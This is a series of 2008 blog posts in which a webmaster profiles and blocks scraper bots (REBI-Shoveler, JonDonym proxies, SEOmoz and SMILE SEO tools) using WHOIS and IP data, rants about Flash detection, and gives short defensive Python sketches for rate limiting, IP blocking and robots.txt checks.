Here's the IP and UA:
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Here's the WHOIS:
inetnum: -
netname: WHO-SLT-LK
country: LK
descr: WHO Representative Office
descr: 385, Health Inform. Centre, Suwasiripaya, Deens Road, Colombo-10
admin-c: NS198-AP
tech-c: NS198-AP
mnt-by: MNT-SLT-LK
source: APNIC

person: Network Administrator SLTNet
nic-hdl: NS198-AP
address: Sri Lanka
country: LK
mnt-by: MNT-SLT-LK
source: APNIC
It pretended to be a human browser like so many of them do these days by pulling all the images from the index page and then it took off ripping pages like a bandit.

It wasn't even a smart bot, as the first link it hit off the index page was my bot trap, which is flagged in robots.txt as a no-crawl zone and easily avoided, so it definitely wasn't human.

Of course the robots.txt file is my other bot trap but what the hell.

Then it went screaming along asking for the next 409 pages at 2-3 pages a second.
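Spotting a burst like that is mostly a matter of counting requests per IP over a short sliding window. A rough Python sketch, purely for illustration: the `RateTracker` class and the thresholds (more than 10 hits in 5 seconds) are assumptions, so tune them to whatever a real human on your site looks like.

```python
from collections import defaultdict, deque
from typing import Deque, Dict


class RateTracker:
    """Flag an IP once it exceeds max_hits requests inside a sliding window."""

    def __init__(self, max_hits: int = 10, window: float = 5.0) -> None:
        self.max_hits = max_hits
        self.window = window  # seconds
        self.hits: Dict[str, Deque[float]] = defaultdict(deque)

    def hit(self, ip: str, now: float) -> bool:
        """Record one request at time `now`; return True if the IP is too fast."""
        recent = self.hits[ip]
        recent.append(now)
        # Forget requests that have fallen out of the window.
        while recent and now - recent[0] > self.window:
            recent.popleft()
        return len(recent) > self.max_hits


if __name__ == "__main__":
    tracker = RateTracker()
    # Simulate a bot asking for 3 pages a second.
    for i in range(15):
        if tracker.hit("192.0.2.1", i / 3):
            print("flagged after request", i + 1)
            break
```

In real use `now` would come from `time.time()` or the timestamp in the access log; passing it in keeps the sketch easy to replay against old logs.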

It would appear that WHO should check out the health of their computer network as something is rotten in their offices in Sri Lanka.

Friday, March 28, 2008

REBI-Shoveler Digging for Korean Search Engine

REBI-Shoveler must be easily overlooked as it's very unusual to go to a search engine and type in the user agent and get no authoritative hit from any bot hunter whatsoever. There were tons of hits from various web stat pages but nothing I could easily find that gave me any clue what in the hell this thing was.

With this little information all I knew was it came from Korea, otherwise I was stumped:
"REBI-Shoveler v0.1"
Finally I decided to see if I could find any more clues in the several years of bot tracking archive files I keep and sure enough, there was a single original hit on my server that contained the answer I was looking for:
"REBI-Shoveler/RS Ver. -100.0 (REBI's great worker ... ;;"
This bot operates out of multiple IPs in the range of 116.122.36.* and here's a little translation for you from their site about REBI. There's no mention of robots.txt, nor did the bot ask for the file when it visited my site today, so it's behaving badly.

Now you know who REBI is that's shoveling shit off of your server.


We'll Have Anon Of That, John Doe Must Go

Looks like JonDonym, the internet anonymisation service, is actively operating, as those little anonymous hits are coming from their servers.

I have a couple of actual scrapes happening from their IPs, who would suspect abuse of anon proxies, right?

Here's a couple of examples of activity:
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: Gecko/20080311 Firefox/
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: Gecko/20080311 Firefox/

Don't know what other IPs it operates from but 141.76.45.* and anything resolving to are blocked for now.
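For anyone wondering what a block on 141.76.45.* boils down to, it's just a /24 network test. A small Python sketch using the standard `ipaddress` module; the `wildcard_to_network` and `is_blocked` helpers are hypothetical names, and the sketch only handles trailing wildcards on IPv4 addresses.

```python
import ipaddress
from typing import Iterable


def wildcard_to_network(pattern: str) -> ipaddress.IPv4Network:
    """Turn a pattern like '141.76.45.*' into the network 141.76.45.0/24."""
    octets = pattern.split(".")
    fixed = [o for o in octets if o != "*"]
    # Only trailing wildcards are supported: 141.76.*.* is fine, 141.*.45.* is not.
    if len(octets) != 4 or octets[: len(fixed)] != fixed:
        raise ValueError("unsupported pattern: " + pattern)
    padded = fixed + ["0"] * (4 - len(fixed))
    return ipaddress.ip_network(".".join(padded) + "/" + str(8 * len(fixed)))


def is_blocked(ip: str, networks: Iterable[ipaddress.IPv4Network]) -> bool:
    """True if the address falls inside any blocked network."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in networks)


if __name__ == "__main__":
    blocked = [wildcard_to_network("141.76.45.*")]
    print(is_blocked("141.76.45.34", blocked))
    print(is_blocked("141.76.46.34", blocked))
```

The reverse DNS half of the block would need a hostname lookup on top of this, which is left out here.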

Good luck with your John Doe anonymity while I work on my taxes as you've just been H&R Blocked!

With tax deadlines close at hand I couldn't resist ;)

Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint. It looks broken, and visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your Flash will work, we're stuck on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere, where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to tell us we don't have Flash installed is just wrong, because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript, you fucking idiots. Use your NOSCRIPT tag to tell us to ENABLE JAVASCRIPT to run the site, and then let the javascript tell us if we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.

I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness

Here's a fine example of how the internet may soon look with an email I got recently that actually asked permission to do something because they couldn't just take what they wanted without asking!

The following is slightly edited, but you get the idea:

We use a service called to provide xxxxxxxx of sites that we have links to on our site.

It appears that the is being blocked. I'm guessing this is a tool you use to block crawlers. You can see the error here:

Is there any way you can allow access of your site?
Yes, manners are still alive and well on the internet and someone has politely requested I punch a hole in the firewall and let them in.

I'm leaning towards YES just because they asked so nicely!

Witness one of the first steps in ending the Wild Wild Web.

Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continuing series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz credit where credit is due in that they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed. I think they assume it's always going to be used by the site owner, but it could just as easily be used on some competitor's site as well.
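Checking robots.txt before fetching isn't hard, which is what makes skipping it so annoying. A minimal Python sketch of what a polite tool could do, using the standard library's `urllib.robotparser`. The `allowed_by_robots` helper, the sample robots.txt and the `example.com` URLs are all made up for illustration; this is not how SEOmoz's tool works.

```python
from urllib.robotparser import RobotFileParser


def allowed_by_robots(robots_txt: str, user_agent: str, url: str) -> bool:
    """Return True if robots_txt lets user_agent fetch url."""
    parser = RobotFileParser()
    # parse() takes the file's lines, so no network access is needed here.
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)


# Hypothetical robots.txt: shut out one named bot, keep everyone out of /trap/.
SAMPLE_ROBOTS = """\
User-agent: SEOmoz-bot
Disallow: /

User-agent: *
Disallow: /trap/
"""

if __name__ == "__main__":
    print(allowed_by_robots(SAMPLE_ROBOTS, "SEOmoz-bot", "http://example.com/page.html"))
    print(allowed_by_robots(SAMPLE_ROBOTS, "SomeOtherBot", "http://example.com/page.html"))
```

A real crawler would download the site's own /robots.txt first (the parser's `set_url()` and `read()` methods do that) and skip any URL where the check comes back False.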

Here are the IPs and the user agent used: "SEOmoz-bot" "SEOmoz-bot"
The IPs belong to HopOne, which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: -
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so-called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.

Here's the list of IPs using this directory spamware. My guess is they're mostly proxy sites in Russia, as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IPs using SMILE SEO Tools for your viewing pleasure:

Just to help you understand where these IPs were coming from, here's the reverse DNS of the same list:
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 2(SERVFAIL)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
;; reply from unexpected source:, expected
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source:, expected
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached
is an alias for
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
;; connection timed out; no servers could be reached
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Host not found: 3(NXDOMAIN)
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.

Heck, just block Russia and the Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.